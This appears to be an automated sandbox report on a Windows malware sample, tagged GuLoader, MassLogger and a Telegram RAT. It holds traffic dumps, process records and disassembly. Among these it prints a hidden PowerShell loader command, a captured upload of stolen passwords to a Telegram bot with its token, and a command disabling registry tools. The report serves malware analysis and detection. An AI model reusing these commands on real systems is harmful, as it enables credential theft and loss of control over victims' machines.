                                                                                                  2024-12-17 11:06:11 UTC4840INData Raw: dc 48 a6 89 ee 66 9f e9 92 34 5a cd ad b5 be 12 a2 8f aa d0 4b 47 f1 a3 01 fe c8 49 c8 78 e3 f9 2c ef d1 79 92 08 67 23 86 ac 64 5d e8 7d 4b 5c 3c 4f 04 ac 55 01 12 a9 52 26 0b 46 39 1f 8c 57 88 dd c6 d4 04 4b b8 59 94 c1 f3 12 80 97 38 29 56 3e 73 4f 5a 27 06 6c d2 9e f0 0b ec 64 5b 96 9d 9c 4d b7 8a c0 50 5f 90 3e e7 6e 42 92 a7 ac 1d 27 16 bd 5b a8 5e 3a 76 f9 d7 29 40 a9 55 57 00 94 59 5f 38 75 cd e0 cc 13 15 0e 41 a9 db 49 6a 62 07 13 b3 4a f6 06 d4 71 29 7e 5c 11 81 a8 e2 70 b6 be 5b e4 30 25 d4 2d a8 59 30 65 25 63 cc c0 ec b0 55 4b 29 00 67 65 43 fe 6b 2c f9 8c d0 31 06 4b bf 42 cb c8 4e b9 9f bd 25 2e 62 a0 cb c1 e9 3c bd 22 e4 c4 6d b6 ae 39 f2 12 aa 30 79 61 d5 c9 f9 ca 2b 50 0d 77 f0 33 cc 50 dc 57 09 cc d8 57 f8 52 23 04 4a 2f a6 6c d2 3f 9b
                                                                                                  Data Ascii: Hf4ZKGIx,yg#d]}K\<OUR&F9WKY8)V>sOZ'ld[MP_>nB'[^:v)@UWY_8uAIjbJq)~\p[0%-Y0e%cUK)geCk,1KBN%.b<"m90ya+Pw3PWWR#J/l?
                                                                                                  2024-12-17 11:06:11 UTC1320INData Raw: 6c 8d b6 b4 4d 0d 27 0d 6f 4c 0a 71 aa 47 89 21 4a 7c 41 8f aa f8 5e a9 3b 34 82 f7 a9 00 a8 d1 19 93 01 0a 6f 47 e3 7c e0 85 25 9d ac 6f e1 0a 4c 3e 6d 7a f2 d3 86 9d 20 ac 4b 4e b6 32 fa 4d 5e 31 dd 6b 10 8b 4f 94 c2 9f b3 21 56 f6 ba 59 38 c4 49 3d 60 3d 77 76 6e 83 f5 94 e7 41 a3 1c 58 0d 43 ba 7b f5 b9 8b 45 c6 63 28 0f 14 59 36 e6 17 ab ee bd e6 a7 48 ac 03 a8 06 ea a5 9e 87 35 67 ba c2 ce b4 cc 7f db 86 1a f0 c4 d3 d0 b1 07 d3 a6 e2 19 9d ac 2e d1 88 00 0b a9 15 50 5c 94 6f c1 a1 86 3b f5 2d e8 ee f6 11 7b f3 d3 c3 df 0c 1c e0 e1 c1 05 a6 15 6b 9b b0 a5 8f 6d 59 2d 7e 4d e9 14 4b 66 f2 80 40 9c 6a d4 09 f6 23 db 8b 27 c7 06 d0 cd 70 85 8b 34 8f dd a3 9d 22 05 aa 98 39 74 84 c6 29 d3 dc 61 e3 cf 23 9d 81 94 8b 11 19 62 6e 1a d2 a9 d3 5a 6f 0b 18 28
                                                                                                  Data Ascii: lM'oLqG!J|A^;4oG|%oL>mz KN2M^1kO!VY8I=`=wvnAXC{Ec(Y6H5g.P\o;-{kmY-~MKf@j#'p4"9t)a#bnZo(
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: cb 2e 07 82 8a 38 53 c1 3e 02 57 5a 27 02 05 b4 9f f0 31 f9 4c da ba 9d 96 4a 49 f8 04 55 4e 9f 0c e6 e2 7d 92 a7 de b4 31 64 5d 5d ae 3f 9e 2d f0 a5 2f 52 da a8 f5 25 86 44 f3 2e 75 b7 42 f8 0c 08 bf 57 a9 a1 95 47 76 14 13 c6 57 65 06 de 70 1d 6e 0a 5c 81 a8 e2 70 9c a3 5b e4 77 ce d4 2d a4 94 28 72 5b b5 e4 87 e6 c2 52 33 bb 70 08 b2 43 ef 67 fc d8 93 ae 9d 78 56 b5 30 cb a2 dc c2 f0 10 0d 69 68 02 e4 b7 04 e0 bd 28 ee c8 c8 ae ae 4d ee 5b aa 30 79 d0 c1 df ee a2 ad 58 1b 6e e8 0c 02 c4 dc 57 12 c4 b7 7e 62 41 2d 66 d7 3b 58 65 d2 3c f4 fa 0c 0e d6 70 b7 06 1f 91 f1 f6 9d b9 9c 34 ed 24 e6 9b cd 3b 1c 53 79 86 aa a8 34 bd 71 c9 eb 34 3a 97 08 cb bd 39 cb d8 e4 d1 0b 5f 14 1b 92 d8 22 b8 f5 f4 69 92 63 1a 02 97 12 de 58 3e 18 fc 2f 01 73 3b e6 c2 e9 9d
                                                                                                  Data Ascii: .8S>WZ'1LJIUN}1d]]?-/R%D.uBWGvWepn\p[w-(r[R3pCgxV0ih(M[0yXnW~bA-f;Xe<p4$;Sy4q4:9_"icX>/s;
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: 69 6a 55 2d ab de 6a b4 0d bc 83 89 ab d5 3b f7 31 b3 fd c2 ef fd f9 e0 3f 60 62 b1 a2 74 d3 29 06 a8 bc 12 8d 82 59 95 3c 20 5d c9 0d 61 d3 08 c7 3e d0 aa 5b bb 20 fe c4 4c ec ed 96 f6 8d d4 7e d6 89 0a 17 80 ac 64 bc a9 e1 86 20 3a 78 f9 c4 e8 40 27 68 21 17 05 9c ca 9f 4d d6 ba 72 70 26 aa 1e b2 89 1f 1b 2c 62 18 b7 83 56 5a e2 45 05 b3 9b 6e 0b 22 43 0c 6b ae aa 88 92 ae c3 bb 6c ba ec 2f 5c 72 9f ac ad 7f 52 95 c9 64 24 6a d1 1f 07 c8 ee dc 1c dd 36 6b bd 87 df 3b 8c 2b 54 00 4e 23 0a c1 44 d8 d2 12 ad a2 33 bd 4f 0b 96 06 65 ac 27 1f 97 74 68 71 d3 8e ab cf a8 25 fc 31 0b 24 45 28 29 8a e9 5b cb 00 02 d8 c4 33 1f 35 e4 02 e0 12 5c ef 7e ad e4 2e 8c 2f 1f 58 26 27 21 06 94 63 10 fc 03 49 fa e1 3e 54 43 00 55 b6 a5 3b 1a 7d 43 5c 05 64 8e cf 7f 36 40
                                                                                                  Data Ascii: ijU-j;1?`bt)Y< ]a>[ L~d :x@'h!Mrp&,bVZEn"Ckl/\rRd$j6k;+TN#D3Oe'thq%1$E()[35\~./X&'!cI>TCU;}C\d6@
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: 25 9f dd 0f db 0a 48 4a 2d 73 e3 d0 da 56 20 ac 40 51 b4 30 f6 33 a3 1d d0 63 78 c8 5e 9f d5 bb 73 2d 7a e5 ab 53 57 3a 32 71 6a 2a 1c f5 3d 83 ff f1 31 15 a3 16 7a 6a 4a a9 76 e8 be a7 48 d5 10 0b 8f 14 5d 14 24 1a ba e9 90 56 79 75 bd 0b c6 27 e0 a5 b5 aa 38 76 97 b7 df a5 cc 7c ca ba 1a f0 ca ad 32 b9 89 be c3 01 0e 47 bf d0 d5 d1 00 0d a3 04 50 57 9d 7c ee 3d 8e b5 9a 3b 20 c2 94 14 75 fc fb 40 ce 0b 0e f6 d8 20 16 a0 1d 7f b7 e6 85 aa 43 7d f7 69 91 77 43 4b 77 fd fc b8 8a 79 d6 29 f8 26 d5 85 a9 ba 07 d0 f4 25 94 8c b0 38 c9 b5 8f 3b 17 88 32 39 72 a8 d5 20 c3 c9 77 1d ce 30 d0 90 c3 3c 1c 1f 6f 42 0d a0 4e c3 81 1f 14 f8 a4 04 dc da bb 9e c4 13 f0 af 05 64 66 ad fa 61 53 de 33 d0 e9 11 53 b4 20 6e ff 77 a2 08 1f 55 4b 7e 48 54 4e a4 4d fc 59 e7 84
                                                                                                  Data Ascii: %HJ-sV @Q03cx^s-zSW:2qj*=1zjJvH]$Vyu'8v|2GPW|=; u@ C}iwCKwy)&%8;29r w0<oBNdfaS3S nwUK~HTNMY
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: 69 50 eb 65 4f fa f9 6c 5d 78 26 d0 97 cf ba da a1 9a dc 08 41 f1 a0 c1 a8 69 34 ac 20 c8 f9 79 9e af 3c 81 8c c5 32 72 72 d8 b7 fc a4 be 5a 25 e9 e1 34 a5 d5 d5 46 0a d8 58 76 eb 58 36 7d cb d1 a7 75 ca 26 ee dd 23 a2 7e 70 b7 1d 04 fb 40 a9 9d b3 85 29 f2 1f 7e a3 ac 3f 0f 56 68 8a bb 8e 8e ae 57 63 fa 3e 21 91 76 11 cf 85 dd cb 9b cd 01 5f 14 17 ee 97 33 b7 8d b6 cc 92 13 73 f1 92 12 c5 48 b2 f9 e8 20 03 8f 06 67 b2 86 77 ca 4e aa ff d3 cb b7 28 70 50 af e4 3c 46 05 10 16 45 96 18 f6 a8 d2 e1 25 0f ff 73 4f 63 3b 34 58 fc ae d4 85 ed bf 99 ac 9f 8d f5 6e 71 44 c0 0f e9 72 d8 c4 b0 c0 9a 06 a8 18 72 c6 cd a9 37 50 0a 69 05 9a 4e c6 52 f7 7e 19 8b ea a0 a6 98 45 ac 71 c1 95 a4 7f 5d 91 e2 46 10 f3 83 4d 6f 4d 7b 15 99 ee 0f 13 4b d2 f0 d7 e4 24 d5 80 c6
                                                                                                  Data Ascii: iPeOl]x&Ai4 y<2rrZ%4FXvX6}u&#~p@)~?VhWc>!v_3sH gwN(pP<FE%sOc;4XnqDrr7PiNR~Eq]FMoM{K$
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: 1e a4 f6 9d 10 30 2c 32 80 2f aa 82 b0 f6 3d b8 77 ac 88 bf bb 77 ef ca 96 de 43 83 b1 d0 c0 69 fe 63 fa d9 e2 fa 7c ce aa 42 cf 35 c4 1e ea 36 a3 15 4e 59 83 e5 44 c2 51 26 94 c3 5d b9 6d 57 5b 32 67 a2 2a 6b a1 4d 0b 0f d0 70 da 7e a9 2f c9 27 8c 10 7c 76 60 bb f2 33 bf 3b 81 d8 c4 12 2b 29 ba 1e c6 03 4c ef 50 14 82 ec 8c 25 95 44 39 36 03 14 8b 5a d4 eb d5 50 d5 be 39 45 4f 2d 95 59 79 d3 cc 6e be 4c 31 58 ac ec ee 23 73 4c 06 83 45 86 74 ba 87 ed 05 c9 51 3a e0 2e 06 d5 6b 36 49 d3 d1 1c 10 6d c6 bf 35 d7 9e e2 5d f4 44 3b 27 37 ce 53 b8 5a 9c 6f 14 0f d5 a4 df b3 45 5e 7e 91 15 1a 62 90 35 ee f1 fd 46 63 7f e5 1e 12 da 69 23 8c ab 1e d0 2a 5c 1a 06 e8 de 6b dc d2 fc 60 2b aa 37 82 13 e3 e6 da a8 60 51 9f 32 4d 9e 1f 90 3e 76 13 92 6f fe eb af ac 7e
                                                                                                  Data Ascii: 0,2/=wwCic|B56NYDQ&]mW[2g*kMp~/'|v`3;+)LP%D96ZP9EO-YynL1X#sLEtQ:.k6Im5]D;'7SZoE^~b5Fci#*\k`+7`Q2M>vo~
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: 06 33 42 e9 a8 a0 86 6d 37 3b a3 13 c0 20 fa e0 e1 1a 75 de a9 40 df 06 c4 e0 f0 ef 57 bc 17 6c b3 38 a5 8f 78 4e f7 69 cc 65 4d 4b 0c f2 93 47 9a 79 dc 01 bc 27 d5 8e b2 9e 10 d4 a0 76 94 8c 89 e6 c9 a4 8f 35 0f aa cf 39 74 88 a7 73 e1 d5 07 35 82 30 97 9a 94 98 1a 20 99 42 0d aa 45 c4 63 59 1b 11 a4 22 eb 0d bb 9f d9 2f ff dd bb 78 66 dd a7 b3 53 cf 35 e9 ed f3 d9 b4 20 69 e3 af a8 09 1f 59 40 6e 39 55 4e ae 45 ed 5c 1b 65 63 a4 60 d3 a8 54 98 12 7c 92 d1 24 ad 4b fd 14 09 7f a3 74 3c 7a 06 9a 2d 52 6a 8d 87 f0 d3 5f ea 68 2b 57 d5 9f 4b d3 05 a5 93 93 a5 9e 5b 3d 8b d8 14 01 25 3b 48 33 aa 03 da 5c a3 52 17 38 82 dd 33 05 90 61 a1 08 79 10 cc be ac a3 81 e4 cc bd 2a e9 d8 23 7b 21 ec 54 28 53 fe 43 4d d1 8a 17 d9 37 44 0f 85 e4 13 f9 b7 b6 33 51 1d c3
                                                                                                  Data Ascii: 3Bm7; u@Wl8xNieMKGy'v59ts50 BEcY"/xfS5 iY@n9UNE\ec`T|$Kt<z-Rj_h+WK[=%;H3\R83ay*#{!T(SCM7D3Q
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: b4 c7 58 2c 06 80 c8 33 bf 96 99 02 1a 0f 75 92 f8 c7 d4 4c c6 16 e5 31 74 eb b0 fa b2 f6 12 09 b0 a9 e8 c5 bd 5d 3c 77 52 05 d0 bd 36 6a cf 00 bb 93 54 e0 b5 c6 c5 9a 42 e2 f8 63 6b 2a 3d 51 a9 da fa 91 ec cf 31 e6 8a 85 57 41 06 35 8d 1a e3 2a ee e1 a9 d7 8d ad 9c 0b 14 5e d9 ba 4d e3 25 64 ea 9e ff e8 5f 8e 54 11 a3 30 02 8e 32 54 a9 14 8d 98 da 7a 4c 98 ce c2 1d db cb 5e 6a 47 fb 1a b2 ce 0b 3b e1 c3 f7 ca 3a 26 d5 e3 7d 19 78 ca 00 51 e6 db 22 9e 73 e3 a8 7c 73 fa b6 53 fe 3e 43 e3 cb f7 6c c6 70 39 69 a1 f2 71 b6 63 3e d2 99 00 8d 48 92 0b 23 14 32 73 81 8b 93 02 f9 43 5c e2 95 9a f3 42 50 32 3b 28 7d a9 92 bd c8 13 19 90 ef 6b d2 f9 19 53 a2 ea 12 65 7b 97 71 fa 01 0e 5c 82 1c d6 e9 a3 09 23 3b b1 44 f2 ae dd 38 9e 53 95 8f 5a 8c 50 fc c8 42 d7 e4
                                                                                                  Data Ascii: X,3uL1t]<wR6jTBck*=Q1WA5*^M%d_T02TzL^jG;:&}xQ"s|sS>Clp9iqc>H#2sC\BP2;(}kSe{q\#;D8SZPB


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.549867149.154.167.2204435064C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-17 11:06:28 UTC296OUTPOST /bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary================8dd1e60f09a017a
                                                                                                  Host: api.telegram.org
                                                                                                  Content-Length: 1077
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-17 11:06:28 UTC1077OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 36 30 66 30 39 61 30 31 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: --===============8dd1e60f09a017aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                  2024-12-17 11:06:29 UTC388INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Tue, 17 Dec 2024 11:06:28 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 540
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  2024-12-17 11:06:29 UTC540INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 30 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 35 39 38 37 35 34 33 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 67 74 7a 7a 7a 7a 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 74 7a 7a 7a 7a 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 33 33 35 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":5084,"from":{"id":7559875433,"is_bot":true,"first_name":"gtzzzz","username":"gtzzzz_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734433588,"document":{"file_name


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:06:04:55
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\dP5z8RpEyQ.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:841'568 bytes
                                                                                                  MD5 hash:307B33A50DCDA8511F357C5DE9DA6B02
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:06:04:55
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
                                                                                                  Imagebase:0x9a0000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2638733328.000000000B5D3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:06:04:56
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:06:05:54
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                  Imagebase:0x780000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:7
                                                                                                  Start time:06:06:19
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                                  Imagebase:0x900000
                                                                                                  File size:59'392 bytes
                                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:06:06:19
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:22.5%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:16.9%
                                                                                                    Total number of Nodes:1335
                                                                                                    Total number of Limit Nodes:33
                                                                                                    execution_graph 3819 4042c3 3820 4042d9 3819->3820 3825 4043e5 3819->3825 3824 404158 18 API calls 3820->3824 3821 404454 3822 40451e 3821->3822 3823 40445e GetDlgItem 3821->3823 3828 4041bf 8 API calls 3822->3828 3829 404474 3823->3829 3830 4044dc 3823->3830 3826 40432f 3824->3826 3825->3821 3825->3822 3831 404429 GetDlgItem SendMessageA 3825->3831 3827 404158 18 API calls 3826->3827 3832 40433c CheckDlgButton 3827->3832 3833 404519 3828->3833 3829->3830 3834 40449a SendMessageA LoadCursorA SetCursor 3829->3834 3830->3822 3835 4044ee 3830->3835 3852 40417a KiUserCallbackDispatcher 3831->3852 3850 40417a KiUserCallbackDispatcher 3832->3850 3856 404567 3834->3856 3839 4044f4 SendMessageA 3835->3839 3840 404505 3835->3840 3839->3840 3840->3833 3844 40450b SendMessageA 3840->3844 3841 40444f 3853 404543 3841->3853 3842 40435a GetDlgItem 3851 40418d SendMessageA 3842->3851 3844->3833 3847 404370 SendMessageA 3848 404397 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3847->3848 3849 40438e GetSysColor 3847->3849 3848->3833 3849->3848 3850->3842 3851->3847 3852->3841 3854 404551 3853->3854 3855 404556 SendMessageA 3853->3855 3854->3855 3855->3821 3859 4057b6 ShellExecuteExA 3856->3859 3858 4044cd LoadCursorA SetCursor 3858->3830 3859->3858 3860 401d44 3861 402bac 17 API calls 3860->3861 3862 401d52 SetWindowLongA 3861->3862 3863 402a5a 3862->3863 3166 401ec5 3174 402bac 3166->3174 3168 401ecb 3169 402bac 17 API calls 3168->3169 3170 401ed7 3169->3170 3171 401ee3 ShowWindow 3170->3171 3172 401eee EnableWindow 3170->3172 3173 402a5a 3171->3173 3172->3173 3175 406167 17 API calls 3174->3175 3176 402bc1 3175->3176 3176->3168 3864 401746 3865 402bce 17 API calls 3864->3865 3866 40174d 3865->3866 3867 405c9c 2 API calls 3866->3867 3868 401754 3867->3868 3868->3868 3869 401947 3870 402bce 17 API calls 3869->3870 3871 40194e lstrlenA 3870->3871 3872 402620 3871->3872 3876 401fcb 3877 402bce 17 API calls 3876->3877 3878 401fd2 3877->3878 3879 406448 2 API calls 3878->3879 3880 401fd8 3879->3880 3882 401fea 3880->3882 3883 406032 wsprintfA 3880->3883 3883->3882 3884 4014d6 3885 402bac 17 API calls 3884->3885 3886 4014dc Sleep 3885->3886 3888 402a5a 3886->3888 3666 401759 3667 402bce 17 API calls 3666->3667 3668 401760 3667->3668 3669 401786 3668->3669 3670 40177e 3668->3670 3706 4060d4 lstrcpynA 3669->3706 3705 4060d4 lstrcpynA 3670->3705 3673 401791 3675 405a6c 3 API calls 3673->3675 3674 401784 3677 4063af 5 API calls 3674->3677 3676 401797 lstrcatA 3675->3676 3676->3674 3680 4017a3 3677->3680 3678 406448 2 API calls 3678->3680 3680->3678 3681 405c48 2 API calls 3680->3681 3682 4017ba CompareFileTime 3680->3682 3683 40187e 3680->3683 3688 4060d4 lstrcpynA 3680->3688 3691 406167 17 API calls 3680->3691 3700 4057f0 MessageBoxIndirectA 3680->3700 3702 401855 3680->3702 3704 405c6d GetFileAttributesA CreateFileA 3680->3704 3681->3680 3682->3680 3684 4051fb 24 API calls 3683->3684 3686 401888 3684->3686 3685 4051fb 24 API calls 3703 40186a 3685->3703 3687 4030d8 31 API calls 3686->3687 3689 40189b 3687->3689 3688->3680 3690 4018af SetFileTime 3689->3690 3692 4018c1 CloseHandle 3689->3692 3690->3692 3691->3680 3693 4018d2 3692->3693 3692->3703 3694 4018d7 3693->3694 3695 4018ea 3693->3695 3696 406167 17 API calls 3694->3696 3697 406167 17 API calls 3695->3697 3698 4018df lstrcatA 3696->3698 3699 4018f2 3697->3699 3698->3699 3701 4057f0 MessageBoxIndirectA 3699->3701 3700->3680 3701->3703 3702->3685 3702->3703 3704->3680 3705->3674 3706->3673 3889 401659 3890 402bce 17 API calls 3889->3890 3891 40165f 3890->3891 3892 406448 2 API calls 3891->3892 3893 401665 3892->3893 3894 401959 3895 402bac 17 API calls 3894->3895 3896 401960 3895->3896 3897 402bac 17 API calls 3896->3897 3898 40196d 3897->3898 3899 402bce 17 API calls 3898->3899 3900 401984 lstrlenA 3899->3900 3902 401994 3900->3902 3901 4019d4 3902->3901 3906 4060d4 lstrcpynA 3902->3906 3904 4019c4 3904->3901 3905 4019c9 lstrlenA 3904->3905 3905->3901 3906->3904 3907 40275d 3908 402763 3907->3908 3909 402a5a 3908->3909 3910 40276b FindClose 3908->3910 3910->3909 3911 404b5d GetDlgItem GetDlgItem 3912 404bb3 7 API calls 3911->3912 3918 404dda 3911->3918 3913 404c5b DeleteObject 3912->3913 3914 404c4f SendMessageA 3912->3914 3915 404c66 3913->3915 3914->3913 3917 404c9d 3915->3917 3919 406167 17 API calls 3915->3919 3916 404ebc 3921 404f68 3916->3921 3930 404f15 SendMessageA 3916->3930 3953 404dcd 3916->3953 3920 404158 18 API calls 3917->3920 3918->3916 3954 404e49 3918->3954 3965 404aab SendMessageA 3918->3965 3924 404c7f SendMessageA SendMessageA 3919->3924 3925 404cb1 3920->3925 3922 404f72 SendMessageA 3921->3922 3923 404f7a 3921->3923 3922->3923 3932 404f93 3923->3932 3933 404f8c ImageList_Destroy 3923->3933 3939 404fa3 3923->3939 3924->3915 3929 404158 18 API calls 3925->3929 3926 404eae SendMessageA 3926->3916 3927 4041bf 8 API calls 3931 405168 3927->3931 3942 404cc2 3929->3942 3935 404f2a SendMessageA 3930->3935 3930->3953 3937 404f9c GlobalFree 3932->3937 3932->3939 3933->3932 3934 40511c 3940 40512e ShowWindow GetDlgItem ShowWindow 3934->3940 3934->3953 3936 404f3d 3935->3936 3946 404f4e SendMessageA 3936->3946 3937->3939 3938 404d9c GetWindowLongA SetWindowLongA 3941 404db5 3938->3941 3939->3934 3956 404fde 3939->3956 3970 404b2b 3939->3970 3940->3953 3943 404dd2 3941->3943 3944 404dba ShowWindow 3941->3944 3942->3938 3945 404d14 SendMessageA 3942->3945 3947 404d97 3942->3947 3950 404d52 SendMessageA 3942->3950 3951 404d66 SendMessageA 3942->3951 3964 40418d SendMessageA 3943->3964 3963 40418d SendMessageA 3944->3963 3945->3942 3946->3921 3947->3938 3947->3941 3950->3942 3951->3942 3953->3927 3954->3916 3954->3926 3955 4050e8 3957 4050f2 InvalidateRect 3955->3957 3960 4050fe 3955->3960 3958 40500c SendMessageA 3956->3958 3959 405022 3956->3959 3957->3960 3958->3959 3959->3955 3962 405096 SendMessageA SendMessageA 3959->3962 3960->3934 3979 404a66 3960->3979 3962->3959 3963->3953 3964->3918 3966 404b0a SendMessageA 3965->3966 3967 404ace GetMessagePos ScreenToClient SendMessageA 3965->3967 3968 404b02 